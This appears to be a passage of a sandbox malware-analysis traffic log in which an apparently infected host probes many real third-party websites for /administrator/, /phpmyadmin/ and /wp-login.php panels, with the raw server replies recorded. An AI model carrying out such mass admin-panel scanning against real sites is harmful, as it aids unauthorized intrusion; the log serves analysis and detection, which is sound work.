Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>
Feb 21, 2024 00:26:09.537605047 CET	250	OUT	GET /administrator/index.php HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://breecetechnology.co.za/administrator/
Feb 21, 2024 00:26:09.739037991 CET	413	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache Content-Length: 268 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.6	56692	188.40.92.90	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.356338978 CET	171	OUT	GET /administrator/ HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.534641981 CET	139	IN	HTTP/1.1 302 Found Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Length: 0
Feb 21, 2024 00:26:10.793358088 CET	225	OUT	GET /administrator/index.php HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.domainmarkt.de/joaz.de
Feb 21, 2024 00:26:10.969918966 CET	139	IN	HTTP/1.1 302 Found Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.6	56680	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.357199907 CET	180	OUT	GET /administrator/ HTTP/1.1 Host: netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.775546074 CET	381	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Location: http://www.netzschnipsel.de/administrator/ Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:10.879688025 CET	242	OUT	GET /administrator/index.php HTTP/1.1 Host: netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://www.netzschnipsel.de/administrator/
Feb 21, 2024 00:26:11.379784107 CET	370	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache X-Powered-By: PHP/7.3.33 X-Pingback: http://www.netzschnipsel.de/xmlrpc.php Location: http://www.netzschnipsel.de/social-media-acta-ein-paar-fakten/index-php/ Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.6	56591	23.236.62.147	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.388115883 CET	176	OUT	GET /administrator/ HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.602575064 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/administrator strict-transport-security: max-age=3600 x-wix-request-id: 1708471569.475735804966118220 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: 9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLpLkXwApeozbAp9OYhJGBzcG/hKs8AeY1T4OIbgnD+yx,2d58ifebGbosy5xc+FRalhaFpx7zEfUH3f7JI4Hej+FZQzaJ0c+rAsbX4pmomEBOGvQYJwEYdNY31x36w1bA Data Raw: Data Ascii:
Feb 21, 2024 00:26:09.602623940 CET	264	IN	Data Raw: 77 3d 3d 2c 32 55 4e 56 37 4b 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 4c 66 42 30 48 37 62 64 52 50 67 54 52 74 63 37 74 71 6e 4f 7a 70 6a 50 5a 54 75 47 79 59 71 56 68 74 6d 45 49 67 4a 55 62 34 77 2c 52 38 6e 56 77 50 4a 76 39 51 4a 4c 31 Data Ascii: w==,2UNV7KOq4oGjA5+PKsX47LfB0H7bdRPgTRtc7tqnOzpjPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+O9xU1dn3Y1oNq7RDoqd004=,9n3wTMzaU7zAZzBAj7gVU8xnbr1XgWNJlTXw2YwN/QT4D2PFRhC5HA4zrltzn4LTADvMOT6qJPQZG2XetDrF4w==Cache-Control: no-cacheX-Content-Type
Feb 21, 2024 00:26:10.800116062 CET	234	OUT	GET /administrator/index.php HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.gmcocorp.com/administrator
Feb 21, 2024 00:26:11.007883072 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/administrator/index.php strict-transport-security: max-age=3600 x-wix-request-id: 1708471570.881735804966218220 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: 9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLpLkXwApeozbAp9OYhJGBzcG/hKs8AeY1T4OIbgnD+yx,2d58ifebGbosy5xc+FRalhNp/tCRsc5zBIO5ShpkX17wEGflXj5WjFI2x/qvkgBj8nNmlKi5tP Data Raw: Data Ascii:
Feb 21, 2024 00:26:11.007913113 CET	274	IN	Data Raw: 65 69 49 72 38 42 39 6c 57 4f 67 3d 3d 2c 32 55 4e 56 37 4b 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 4d 44 73 64 6c 52 64 61 6a 59 42 52 6c 6d 36 77 69 78 2b 64 77 74 6a 50 5a 54 75 47 79 59 71 56 68 74 6d 45 49 67 4a 55 62 34 77 2c 52 38 6e Data Ascii: eiIr8B9lWOg==,2UNV7KOq4oGjA5+PKsX47MDsdlRdajYBRlm6wix+dwtjPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+CLIiD8kgg4qaApVirf92SI=,9n3wTMzaU7zAZzBAj7gVU6RkSst/bXPEBo8qixNbARz4D2PFRhC5HA4zrltzn4LTvpmiH49/EXqYIBhozSndWg==Cache-Control: no-cacheX-Co

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.6	56565	223.29.45.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.416296959 CET	185	OUT	GET /administrator/ HTTP/1.1 Host: shinko-kensetsu.co.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.694705009 CET	469	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache Location: http://www.shinko-kensetsu.eei.jp/administrator/ Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.shinko-kensetsu.eei.jp/administrator/">here</a>.</p></body></html>
Feb 21, 2024 00:26:13.035151958 CET	194	OUT	GET /administrator/index.php HTTP/1.1 Host: shinko-kensetsu.co.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.312308073 CET	487	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Location: http://www.shinko-kensetsu.eei.jp/administrator/index.php Content-Length: 265 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.shinko-kensetsu.eei.jp/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.6	56750	144.91.85.110	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.450941086 CET	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.630892038 CET	533	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://m-viper.de/phpmyadmin/ X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: master-only Referrer-Policy: same-origin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.6	56624	218.213.216.154	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.460347891 CET	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.hk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.785635948 CET	1286	IN	HTTP/1.0 401 Unauthorized Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache Set-Cookie: phpMyAdmin=q040le7ctniouj58v4s98kqrctgrt2sr; path=/phpmyadmin/; HttpOnly Expires: Wed, 21 Feb 2024 07:26:09 +0800 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 Last-Modified: Wed, 21 Feb 2024 07:26:09 +0800 Set-Cookie: pma_lang=en; expires=Thu, 21-Mar-2024 23:26:09 GMT; path=/phpmyadmin/; httponly Set-Cookie: pma_collation_connection=utf8_unicode_ci; expires=Thu, 21-Mar-2024 23:26:09 GMT; path=/phpmyadmin/; httponly Set-Cookie: phpMyAdmin=2krqaai73ck5bcd1u2i87btkcddrqmsq; path=/phpmyadmin/; HttpOnly X-ob_mode: 1 WWW-Authenticate: Basic realm="phpMyAdmin localhost" status: 401 Unauthorized X-Frame-Options: DENY Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;;style-src 'self' 'unsafe-inline' ;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org .tile.opencyclemap.org; X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org .tile.opencyclemap.org; X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' ' Data Raw: Data Ascii:
Feb 21, 2024 00:26:09.785692930 CET	1286	IN	Data Raw: 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 3b 69 6d 67 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 20 2a 2e 74 69 6c 65 2e 6f 70 65 6e 73 74 72 65 65 74 6d 61 70 2e 6f 72 67 20 2a 2e 74 69 6c 65 2e 6f 70 65 6e 63 79 63 6c 65 6d 61 70 2e Data Ascii: nsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org .tile.opencyclemap.org;Pragma: no-cacheContent-Encoding: gzipVary: Accept-EncodingContent-Length: 1519Connection: closeContent-Type: text/html; charset=utf-8
Feb 21, 2024 00:26:09.785762072 CET	469	IN	Data Raw: 47 87 87 e8 20 d4 7c 0e 49 c8 a5 f3 61 a5 cd 42 97 60 f5 cc e8 97 bd 93 47 b3 97 b3 0f 5e 9d 65 2f 96 62 01 b7 fe 2e bd 47 a1 d0 fe 70 af 06 7d 77 7d 46 fb a3 e5 d0 8d 26 6a da 96 52 a8 e1 b7 a1 80 1a dc fd c2 a7 71 ef d0 3b 5d 80 0d 99 d3 05 ba Data Ascii: G \|IaB`G^e/b.Gp}w}F&jRq;]n:V-6-mxqjShh&@okh!_ zSh:.qzxuV<iw=*EwrZinVYnKjJ-m1on

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.6	56771	86.107.32.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.467689991 CET	175	OUT	GET /wp-login.php HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.655679941 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Length: 13697 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-ali
Feb 21, 2024 00:26:09.655711889 CET	1286	IN	Data Raw: 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 7b 6d 61 72 67 69 6e 3a Data Ascii: gn: center;} .link {margin-top: 40px;} .sk-circle {margin: 80px auto;width: 100px;height: 100px;position: relative;} .sk-circle .sk-child {width: 100%;height: 100%;position: absolute;left: 0;top: 0;}
Feb 21, 2024 00:26:09.655730963 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 38 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 31 30 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 Data Ascii: } .sk-circle .sk-circle8 {-webkit-transform: rotate(210deg);-ms-transform: rotate(210deg);transform: rotate(210deg); } .sk-circle .sk-circle9 {-webkit-transform: rotate(240deg);-ms-transform: rotate(240deg);transform:
Feb 21, 2024 00:26:09.655831099 CET	1286	IN	Data Raw: 72 65 20 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c Data Ascii: re {-webkit-animation-delay: -0.5s;animation-delay: -0.5s; } .sk-circle .sk-circle9:before {-webkit-animation-delay: -0.4s;animation-delay: -0.4s; } .sk-circle .sk-circle10:before {-webkit-animation-delay: -0.3s;animati
Feb 21, 2024 00:26:09.655843973 CET	1286	IN	Data Raw: 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 62 72 6f 77 73 65 72 49 6e 74 65 67 72 69 74 79 43 68 65 63 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 Data Ascii: }, 1000); } function browserIntegrityCheck() { w = window.innerWidth; h = window.innerHeight; arr = [w, h, Math.floor((Math.random() * 9) + 1)]; arr.pus
Feb 21, 2024 00:26:09.655857086 CET	1286	IN	Data Raw: 74 72 69 6e 67 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 73 73 69 62 6c 65 20 3d 20 22 41 42 43 44 45 46 47 48 49 Data Ascii: tring() { var text = ""; var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < 5; i++) text += possible.charAt(Math.floor(Math.
Feb 21, 2024 00:26:09.655869961 CET	1286	IN	Data Raw: 22 63 65 6e 74 65 72 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 Data Ascii: "center" valign="middle"> <div> <noscript> <h1 style="color:#990000;">Please, turn Javascript on in your browser then reload the page.</h1> </noscript>
Feb 21, 2024 00:26:09.655900002 CET	1286	IN	Data Raw: 20 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 69 6e 67 20 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 20 73 65 63 75 72 65 6c 79 e2 80 a6 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 Data Ascii: <h1>Accessing /wp-login.php securely</h1> <span>This is an automatic process. Your browser will redirect to your requested content in <span id="seconds">5</span> seconds.</span> </d
Feb 21, 2024 00:26:09.655914068 CET	1286	IN	Data Raw: 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 63 6f 6d 5f 61 63 61 6a 6f 6f 6d 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 27 69 6e 64 65 78 2e 70 68 70 3f 6f 70 74 69 6f 6e 3d 63 6f 6d 5f 63 6f 6e 74 65 6e 74 27 3e 54 68 69 73 20 Data Ascii: out /components/com_acajoom/ </a><br><a href='index.php?option=com_content'>This contact form is about /components/com_content/ </a><br><a href='index.php?option=com_phocagallery'>This contact form is about /components/com_phocagallery/ </a>
